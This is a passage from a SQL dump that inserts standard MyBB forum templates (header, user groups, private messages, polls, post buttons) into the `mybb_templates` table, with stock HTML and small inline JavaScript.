href=\"{$mybb->settings[\'bburl\']}/modcp.php?action=editprofile&amp;uid={$uid}\">{$lang->edit_usernotes}</a> </td> </tr> </table> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('115', 'header_welcomeblock_guest', '<script type=\"text/javascript\"> <!-- lang.username = \"{$login_username}\"; lang.password = \"{$lang->login_password}\"; lang.login = \"{$lang->login}\"; lang.lost_password = \" &mdash; <a href=\\\"{$mybb->settings[\'bburl\']}/member.php?action=lostpw\\\">{$lang->lost_password}<\\/a>\"; lang.register_url = \" &mdash; <a href=\\\"{$mybb->settings[\'bburl\']}/member.php?action=register\\\">{$lang->welcome_register}<\\/a>\"; lang.remember_me = \"{$lang->remember_me}\"; // --> </script> <span style=\"float: right;\">{$lang->welcome_current_time}</span> <span id=\"quick_login\">{$lang->welcome_guest} (<a href=\"{$mybb->settings[\'bburl\']}/member.php?action=login\" onclick=\"MyBB.quickLogin(); return false;\">{$lang->welcome_login}</a> &mdash; <a href=\"{$mybb->settings[\'bburl\']}/member.php?action=register\">{$lang->welcome_register}</a>)</span>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('116', 'header', ' <div id=\"container\"> <a name=\"top\" id=\"top\"></a> <div id=\"header\"> <div class=\"logo\"><a href=\"{$mybb->settings[\'bburl\']}/index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" title=\"{$mybb->settings[\'bbname\']}\" /></a></div> <div class=\"menu\"> <ul> <li><a href=\"{$mybb->settings[\'bburl\']}/search.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/search.gif\" alt=\"\" title=\"\" />{$lang->toplinks_search}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/memberlist.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/memberlist.gif\" alt=\"\" title=\"\" />{$lang->toplinks_memberlist}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/calendar.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/calendar.gif\" alt=\"\" title=\"\" />{$lang->toplinks_calendar}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=help\"><img src=\"{$theme[\'imgdir\']}/toplinks/help.gif\" alt=\"\" title=\"\" />{$lang->toplinks_help}</a></li> </ul> </div> <hr class=\"hidden\" /> <div id=\"panel\"> {$welcomeblock} </div> </div> <hr class=\"hidden\" /> <br class=\"clear\" /> <div id=\"content\"> {$pm_notice} {$bannedwarning} {$bbclosedwarning} {$unreadreports} {$pending_joinrequests} <navigation> <br /> ', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('117', 'usercp_usergroups_leader_usergroup', '<tr> <td class=\"{$trow}\"><strong>{$usergroup[\'title\']}</strong></td> <td class=\"{$trow}\" align=\"center\">{$usergroup[\'users\']} {$memberlistlink}</td> <td class=\"{$trow}\" align=\"center\">{$usergroup[\'joinrequests\']} {$moderaterequestslink}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('118', 'usercp_usergroups_leader', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->usergroups_leader}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"36%\"><strong><span class=\"smalltext\">{$lang->usergroup}</span></strong></td> <td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->usergroup_members}</span></strong></td> <td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->join_requests}</span></strong></td> </tr> {$groupsledlist} </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('119', 'usercp_usergroups_joinable', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->usergroups_joinable}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"36%\"><strong><span class=\"smalltext\">{$lang->usergroup}</span></strong></td> <td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->join_conditions}</span></strong></td> <td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->join_group}</span></strong></td> </tr> {$joinablegrouplist} </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('120', 'usercp_usergroups_joinable_usergroup', '<tr> <td class=\"{$trow}\"><strong>{$usergroup[\'title\']}</strong>{$description}</td> <td class=\"{$trow}\"><span class=\"smalltext\">{$conditions}</span><br /><span class=\"smalltext\">{$usergroupleaders}</span></td> <td class=\"{$trow}\" align=\"center\">{$joinlink}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('121', 'usercp_usergroups_memberof_usergroup', '<tr> <td class=\"{$trow}\"><strong>{$usergroup[\'title\']}</strong> {$displaycode}{$description}</td> <td class=\"{$trow}\" align=\"center\">{$usergroup[\'usertitle\']}</td> <td class=\"{$trow}\">{$leavelink}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('122', 'usercp_usergroups', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->group_memberships}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$leadinggroups} {$joinablegroups} {$membergroups} </td> </tr> </table> {$footer} </body> </html>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('123', 'usercp_usergroups_memberof', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->usergroups_memberof}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"35%\"><strong><span class=\"smalltext\">{$lang->usergroup}</span></strong></td> <td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->usertitle}</span></strong></td> <td class=\"tcat\" align=\"center\" width=\"32%\"><strong><span class=\"smalltext\">{$lang->usergroup_leave}</span></strong></td> </tr> {$memberoflist} </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('124', 'managegroup', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->members_of}</title> {$headerinclude} </head> <body> {$header} {$joinrequests} <p>{$usergrouptype}</p> {$group_leaders} <form method=\"post\" action=\"managegroup.php\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_manageusers\" /> <input type=\"hidden\" name=\"gid\" value=\"{$gid}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"><strong>{$lang->members_of}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"40%\"><span class=\"smalltext\"><strong>{$lang->user_name}</strong></span></td> <td class=\"tcat\" colspan=\"2\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->contact}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->reg_date}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->post_count}</strong></span></td> <td class=\"tcat\" width=\"1\">&nbsp;</td> </tr> {$users} </table> <br /> <div align=\"center\">{$remove_users}</div> </form> {$add_user} {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('125', 'managegroup_removeusers', '<input type=\"submit\" class=\"button\" value=\"{$lang->remove_selected}\" />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('126', 'managegroup_adduser', '<br /> <form method=\"post\" action=\"managegroup.php\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_add\" /> <input type=\"hidden\" name=\"gid\" value=\"{$gid}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"><strong>{$lang->add_member}</strong></td> </tr> <tr> <td class=\"trow1\">{$lang->username}</td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"username\" size=\"40\" maxlength=\"{$mybb->settings[\'maxnamelength\']}\" /></td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->add_member_submit}\" /></div> </form>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('127', 'managegroup_no_users', '<tr> <td class=\"trow1\" colspan=\"6\">{$lang->no_users}</td> </tr>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('128', 'managegroup_user', '<tr> <td class=\"{$altbg}\">{$user[\'profilelink\']} {$leader}</td> <td class=\"{$altbg}\" align=\"center\" width=\"100\">{$email}</td> <td class=\"{$altbg}\" align=\"center\" width=\"100\">{$sendpm}</td> <td class=\"{$altbg}\" align=\"center\">{$regdate}</td> <td class=\"{$altbg}\" align=\"center\">{$user[\'postnum\']}</td> <td class=\"{$altbg}\" align=\"center\">{$checkbox}</td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('129', 'managegroup_user_checkbox', '<input type=\"checkbox\" class=\"checkbox\" name=\"removeuser[{$user[\'uid\']}]\" value=\"{$user[\'uid\']}\" />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('130', 'managegroup_requestnote', '<p> <strong><a href=\"managegroup.php?action=joinrequests&amp;gid={$gid}\">{$lang->pending_requests}</a></strong><br /> {$lang->num_requests_pending} </p>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('131', 'managegroup_joinrequests', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->join_requests}</title> {$headerinclude} </head> <body> {$header} {$joinrequests} <form method=\"post\" action=\"managegroup.php\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_joinrequests\" /> <input type=\"hidden\" name=\"gid\" value=\"{$gid}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"><strong>{$lang->join_requests}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"30%\"><strong>{$lang->user_name}</strong></td> <td class=\"tcat\" align=\"center\" width=\"40%\"><strong>{$lang->reason}</strong></td> <td class=\"tcat\" align=\"center\" width=\"10%\"><strong>{$lang->accept}</strong></td> <td class=\"tcat\" align=\"center\" width=\"10%\"><strong>{$lang->ignore}</strong></td> <td class=\"tcat\" align=\"center\" width=\"10%\"><strong>{$lang->decline}</strong></td> </tr> {$users} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->action_requests}\" /></div> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('132', 'managegroup_joinrequests_request', '<tr> <td class=\"{$altbg}\">{$user[\'profilelink\']}</td> <td class=\"{$altbg}\" align=\"center\">{$user[\'reason\']}</td> <td class=\"{$altbg}\" align=\"center\"><input type=\"radio\" class=\"radio\" name=\"request[{$user[\'uid\']}]\" value=\"accept\" /></td> <td class=\"{$altbg}\" align=\"center\"><input type=\"radio\" class=\"radio\" name=\"request[{$user[\'uid\']}]\" value=\"ignore\" checked=\"checked\" /></td> <td class=\"{$altbg}\" align=\"center\"><input type=\"radio\" class=\"radio\" name=\"request[{$user[\'uid\']}]\" value=\"decline\" /></td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('133', 'managegroup_leaders', '<p>{$lang->group_leaders}: {$leaders}</p>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('134', 'managegroup_leaders_bit', '{$leader_profile_link}{$comma}', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('135', 'private_send', '<html> <head> <title>{$lang->compose_pm}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/usercp.js?ver=1600\"></script> </head> <body> {$header} <form action=\"private.php\" method=\"post\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$preview} {$send_errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->compose_pm}</strong></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"200\"><strong>{$lang->compose_to}</strong> <script type=\"text/javascript\"> <!-- document.write(\'(<a href=\"#\" onclick=\"showBcc(); return false;\" title=\"{$lang->compose_bcc_show_title}\">{$lang->compose_bcc_show}<\\/a>)\'); // --> </script> <br /><span class=\"smalltext\">{$lang->separate_names}{$buddy_select_to}</span></td> <td class=\"trow1\" valign=\"top\"><textarea name=\"to\" id=\"to\" rows=\"2\" cols=\"38\" tabindex=\"1\">{$to}</textarea>{$max_recipients}</td> </tr> <tr id=\"bcc_area\"> <td class=\"trow2\" valign=\"top\"><strong>{$lang->compose_bcc}</strong>{$buddy_select_bcc}</td> <td class=\"trow2\"><textarea name=\"bcc\" id=\"bcc\" rows=\"2\" cols=\"38\" tabindex=\"1\">{$bcc}</textarea></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->compose_subject}</strong></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"3\" /></td> </tr> {$posticons} <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->compose_message}</strong>{$smilieinserter}</td> <td class=\"trow2\"> <textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"4\">{$message}</textarea> {$codebuttons} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->compose_options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"options[signature]\" value=\"1\" tabindex=\"5\" {$optionschecked[\'signature\']} />{$lang->options_sig}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"options[disablesmilies]\" value=\"1\" tabindex=\"6\" {$optionschecked[\'disablesmilies\']} />{$lang->options_disable_smilies}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"options[savecopy]\" value=\"1\" tabindex=\"7\" {$optionschecked[\'savecopy\']} />{$lang->options_save_copy}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"options[readreceipt]\" value=\"1\" tabindex=\"8\" {$optionschecked[\'readreceipt\']} />{$lang->options_read_receipt}</label><br /> </span></td> </tr> </table> <br /> <input type=\"hidden\" name=\"action\" value=\"do_send\" /> <input type=\"hidden\" name=\"pmid\" value=\"{$pmid}\" /> <input type=\"hidden\" name=\"do\" value=\"{$do}\" /> <div style=\"text-align: center;\"> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->send_message}\" tabindex=\"9\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"saveasdraft\" value=\"{$lang->save_draft}\" tabindex=\"10\" /> <input type=\"submit\" class=\"button\" name=\"preview\" value=\"{$lang->preview}\" tabindex=\"11\" /> </div> </td> </tr> </table> </form> {$footer} <script type=\"text/javascript\"> <!-- if($(\'bcc_area\') && $(\'bcc\').value == \"\") { $(\'bcc_area\').style.display = \'none\'; } function showBcc() { if($(\'bcc_area\').style.display == \'none\') { $(\'bcc_area\').style.display = \'\'; } else { $(\'bcc_area\').style.display = \'none\'; } } // --> </script> {$autocompletejs} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('136', 'showthread_newreply_closed', '<a href=\"newreply.php?tid={$tid}\"><img src=\"{$theme[\'imglangdir\']}/closed.gif\" alt=\"{$lang->thread_closed}\" title=\"{$lang->thread_closed}\" /></a>&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('137', 'polls_editpoll', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_poll}</title> {$headerinclude} </head> <body> {$header} {$preview} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_poll}</strong></td> </tr> <tr> <td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /><strong>{$lang->delete_q}</strong></td> <td class=\"trow1\" width=\"100%\">{$lang->delete_note}<br /><span class=\"smalltext\">{$lang->delete_note2}</span></td> <td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_poll}\" tabindex=\"10\" /></td> </table> <input type=\"hidden\" name=\"action\" value=\"do_deletepoll\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> <br /> <form action=\"polls.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_poll}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->question}</strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"question\" size=\"40\" maxlength=\"240\" value=\"{$question}\" /></td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->num_options}</strong><br /><span class=\"smalltext\">{$lang->max_options} {$mybb->settings[\'maxpolloptions\']}</span></td> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"numoptions\" size=\"10\" value=\"{$numoptions}\" />&nbsp;&nbsp;<input type=\"submit\" class=\"button\" name=\"updateoptions\" value=\"{$lang->update_options}\" /></td> </tr> <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->poll_options}</strong></td> <td class=\"trow2\"><span class=\"smalltext\">{$lang->poll_options_note}</span> <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"> {$optionbits} </table> </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[multiple]\" value=\"1\" {$postoptionschecked[\'multiple\']} />&nbsp;{$lang->option_multiple}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[public]\" value=\"1\" {$postoptionschecked[\'public\']} />&nbsp;{$lang->option_public}</label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[closed]\" value=\"1\" {$postoptionschecked[\'closed\']} />&nbsp;{$lang->option_closed}</label> </span> </td> </tr> <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->poll_timeout}</strong><br /><span class=\"smalltext\">{$lang->timeout_note}</span></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"timeout\" value=\"{$timeout}\" /> {$lang->days_after} {$polldate}</td> </tr> </table> <br /> <div align=\"center\"> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_poll}\" /> </div> <input type=\"hidden\" name=\"action\" value=\"do_editpoll\" /> <input type=\"hidden\" name=\"pid\" value=\"{$pid}\" /> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('138', 'forumbit_depth1_cat', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"5\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/{$expcolimage}\" id=\"cat_{$forum[\'fid\']}_img\" class=\"expander\" alt=\"{$expaltext}\" title=\"{$expaltext}\" /></div> <div><strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong><br /><div class=\"smalltext\">{$forum[\'description\']}</div></div> </td> </tr> </thead> <tbody style=\"{$expdisplay}\" id=\"cat_{$forum[\'fid\']}_e\"> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td> <td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td> <td class=\"tcat\" width=\"85\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td> <td class=\"tcat\" width=\"200\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td> </tr> {$sub_forums} </tbody> </table> <br />', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('139', 'postbit_edit', '<a href=\"editpost.php?pid={$post[\'pid\']}\" id=\"edit_post_{$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_edit.gif\" alt=\"{$lang->postbit_edit}\" title=\"{$lang->postbit_edit}\" /></a> <div id=\"edit_post_{$post[\'pid\']}_popup\" class=\"popup_menu\" style=\"display: none;\"><div class=\"popup_item_container\"><a href=\"javascript:;\" onclick=\"Thread.quickEdit({$post[\'pid\']});\" class=\"popup_item\">{$lang->postbit_quick_edit}</a></div><div class=\"popup_item_container\"><a href=\"editpost.php?pid={$post[\'pid\']}\" class=\"popup_item\">{$lang->postbit_full_edit}</a></div></div> <script type=\"text/javascript\"> // <!-- if(use_xmlhttprequest == \"1\") { new PopupMenu(\"edit_post_{$post[\'pid\']}\"); } // --> </script>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('140', 'postbit_email', '<a href=\"member.php?action=emailuser&amp;uid={$post[\'uid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_email.gif\" alt=\"{$lang->postbit_email}\" title=\"{$lang->postbit_email}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('141', 'postbit_find', '<a href=\"search.php?action=finduser&amp;uid={$post[\'uid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_find.gif\" alt=\"{$lang->postbit_find}\" title=\"{$lang->postbit_find}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('142', 'postbit_pm', '<a href=\"private.php?action=send&amp;uid={$post[\'uid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_pm.gif\" alt=\"{$lang->postbit_pm}\" title=\"{$lang->postbit_pm}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('143', 'postbit_quickdelete', '<a href=\"editpost.php?pid={$post[\'pid\']}\" onclick=\"Thread.deletePost({$post[\'pid\']}); return false;\" style=\"display: none;\" id=\"quick_delete_{$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_delete.gif\" alt=\"{$lang->postbit_qdelete}\" title=\"{$lang->postbit_qdelete}\" /></a> <script type=\"text/javascript\"> // <!-- $(\'quick_delete_{$post[\'pid\']}\').style.display = \'\'; // --> </script>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('144', 'postbit_quote', '<a href=\"newreply.php?tid={$tid}&amp;pid={$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_quote.gif\" alt=\"{$lang->postbit_quote}\" title=\"{$lang->postbit_quote}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('145', 'postbit_rep_button', '<a href=\"javascript:MyBB.reputation({$post[\'uid\']},{$post[\'pid\']});\"><img src=\"{$theme[\'imglangdir\']}/postbit_reputation.gif\" alt=\"{$lang->postbit_reputation_add}\" title=\"{$lang->postbit_reputation_add}\" /></a>', '-2', '1607', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('146', 'postbit_report', '<a href=\"javascript:Thread.reportPost({$post[\'pid\']});\"><img src=\"{$theme[\'imglangdir\']}/postbit_report.gif\" alt=\"{$lang->postbit_report}\" title=\"{$lang->postbit_report}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('147', 'postbit_www', '<a href=\"{$post[\'website\']}\" target=\"_blank\"><img src=\"{$theme[\'imglangdir\']}/postbit_www.gif\" alt=\"{$lang->postbit_website}\" title=\"{$lang->postbit_website}\" /></a>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('148', 'polls_showresults_resultbit', '<tr> <td class=\"{$optionbg}\" align=\"right\">{$option}{$votestar}</td> <td class=\"{$optionbg}\" width=\"{$imagerowwidth}\"><img src=\"{$theme[\'imgdir\']}/pollbar-s.gif\" alt=\"\" /><img src=\"{$theme[\'imgdir\']}/pollbar.gif\" width=\"{$imagewidth}\" height=\"10\" alt=\"{$percent}%\" title=\"{$percent}%\" /><img src=\"{$theme[\'imgdir\']}/pollbar-e.gif\" alt=\"\" /><br />{$userlist}</td> <td class=\"{$optionbg}\" width=\"67\" align=\"center\">{$votes}</td> <td class=\"{$optionbg}\" width=\"67\" align=\"center\">{$percent}%</td> </tr> ', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('149', 'showthread_poll_resultbit', '<tr> <td class=\"{$optionbg}\" align=\"right\">{$option}{$votestar}</td> <td class=\"{$optionbg}\"><img src=\"{$theme[\'imgdir\']}/pollbar-s.gif\" alt=\"\" /><img src=\"{$theme[\'imgdir\']}/pollbar.gif\" width=\"{$imagewidth}\" height=\"10\" alt=\"{$percent}%\" title=\"{$percent}%\" /><img src=\"{$theme[\'imgdir\']}/pollbar-e.gif\" alt=\"\" /></td> <td class=\"{$optionbg}\" width=\"67\" align=\"center\">{$votes}</td> <td class=\"{$optionbg}\" width=\"67\" align=\"center\">{$percent}%</td> </tr> ', '-2', '1402', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('150', 'showteam_usergroup', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$usergroup[\'title\']}</strong></td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->uname}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->email}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->pm}</strong></span></td> </tr> {$usergrouprows} </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('151', 'showteam_moderators', '<table border=\"0\" 